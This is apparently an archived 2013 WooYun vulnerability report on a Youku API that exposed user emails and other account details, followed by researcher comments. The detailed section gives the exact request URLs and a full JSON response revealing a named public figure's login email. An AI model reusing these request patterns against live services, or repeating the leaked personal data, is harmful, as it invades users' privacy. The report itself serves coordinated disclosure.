当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026787

漏洞标题:优酷某接口任意用户信息获取漏洞,可获取指定密码

相关厂商:优酷

漏洞作者: 猪猪侠

提交时间:2013-06-24 17:00

修复时间:2013-08-08 17:00

公开时间:2013-08-08 17:00

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-24: 细节已通知厂商并且等待厂商处理中
2013-06-24: 厂商已经确认,细节仅向厂商公开
2013-07-04: 细节向核心白帽子及相关领域专家公开
2013-07-14: 细节向普通白帽子公开
2013-07-24: 细节向实习白帽子公开
2013-08-08: 细节向公众公开

简要描述:

优酷系统的API,在输出用户信息时未进行严格的业务逻辑设计,直接输出了用户的邮箱、用户名、用户密码、用户登录IP、用户手机、QQ、MSN等敏感信息。

详细说明:

#1 访问老罗的个人主页

http://i.youku.com/u/id_UMTcwMjk0NA==


#2 个人主页页面会自动请求如下API,获取用户的个人主页访问量

http://i.youku.com/user_pv/id_425736_md5_1e522f6831febf75e033cfe26fd0cec4_time_1372057646.html


id_425736_md5,id后的数字为用户的个人真实ID
# 构造请求获取用户数据

http://i.youku.com/u/get_status?__rt=1&__ro=&uid=425736&type=user_timeline&page=1&t=1372057786017&size=10


# 此处用测试帐号演示

youku.png


youkupa.png


{"userId":"425736","userName":"\u8001\u7f57","name":null,"regDate":"2006-11-04 10:06:54","contentTotal":"28","scoreTotal":"380","favTotal":"0","friendTotal":"0","pkTotal":"3091716","clubTotal":"0","gender":"0","city":"1","birthDay":"0000-00-00","birthDayDesc":"\u65e0\u678160","icon":"100","pvTotal":"391291","orderBy":null,"lastLoginDate":"2006-11-04 10:06:54","lastLoginDateDesc":"6\u5e74\u524d","statValue":null,"subTotal":null,"userSet":"23","email":"laol@youku.com","returnType":null,"icon64":"","icon150":"","iconUpdateTime":null,"contentFavTotal":"13159","ecdUserId":"UMTcwMjk0NA==","genderDesc":"\u7537","cityDesc":"\u5317\u4eac\u5e02","QQ":"","MSN":"","intro":"","status":"1","contentPvTotal":"15564997","messageTotal":"0","subscribeTotal":"0","folderTotal":"1","folderPvTotal":0},"info":{"email_status":0,"uid":425736,"reason":null,"status":0,"nickname":"\u8001\u7f57","bflag":0,"from":null,"nameCheckStatus":0,"ctime":1319188273080,"username":"\u8001\u7f57","email":"laol@youku.com","domain":"","tmpEmail":"","oldUsername":null,"login":1371969255588,"nameVersion":0,"mobile":""},"verified_icon":1,"encode_id":"UMTcwMjk0NA==","is_self":false,"login_user_id":"65214337","login_user_encode_id":"UMjYwODU3MzQ4","it":"\u4ed6","is_official":false,"rolltips":0,"firstrunGuide":1,"firstrunGuidee":2,"firstrunGuideee":0,"favtips":0,"canuseboard":1,"canusebanner":1,"board":{"state":0,"content":""},"mod":{"m_headline":1,"m_video":1,"m_playlist":1,"m_favorite":1,"m_statuses":1,"m_user":1,"m_guestbook":1,"m_friend":1,"m_follower":1,"m_visitor":1,"id":425736,"m_address":1},"pvtime":1372064276,"pvmd5":"79cdb02deead4aede3cf7c4fa8547ac7"}}

漏洞证明:

获得罗永浩的登录邮箱为:laol@youku.com

修复方案:

不该输出的信息还是尽量不要输出。

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-06-24 17:09

厂商回复:

修复中

最新状态:

暂无

漏洞评价:

评论

  1. 2013-06-24 17:01 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    又来。。。 我勒个去。。。@优酷 修复的时候长点心哟!

  2. 2013-06-24 17:03 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    好恐怖~

  3. 2013-06-24 17:03 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    给力! mark

  4. 2013-06-24 17:08 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    什么情况!

  5. 2013-06-24 17:09 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    优酷API忒强大了,互联网典范啊

  6. 2013-06-24 17:10 | 贱心 ( 普通白帽子 | Rank:248 漏洞数:23 | 贱有锋而形不露,以心为贱,是为藏贱。)

    API做的太强悍了

  7. 2013-06-24 17:12 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    优酷应急响应真快呀!

  8. 2013-06-24 17:21 | 1ee ( 普通白帽子 | Rank:105 漏洞数:14 | 看书中....)

    mark 学习一下

  9. 2013-06-25 09:53 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    这个真心马克

  10. 2013-07-24 20:52 | 黄小昏 ( 实习白帽子 | Rank:55 漏洞数:7 | alert(妹子))

    马克了。学习

  11. 2013-07-25 00:22 | 十月 ( 路人 | Rank:12 漏洞数:1 | 小人物)

    mark

  12. 2013-07-28 14:59 | 一碗菊花茶 ( 路人 | Rank:20 漏洞数:5 | ,,,。。。,,。。。。,,,。。)

    哇,,,,

  13. 2013-08-08 19:36 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    学习了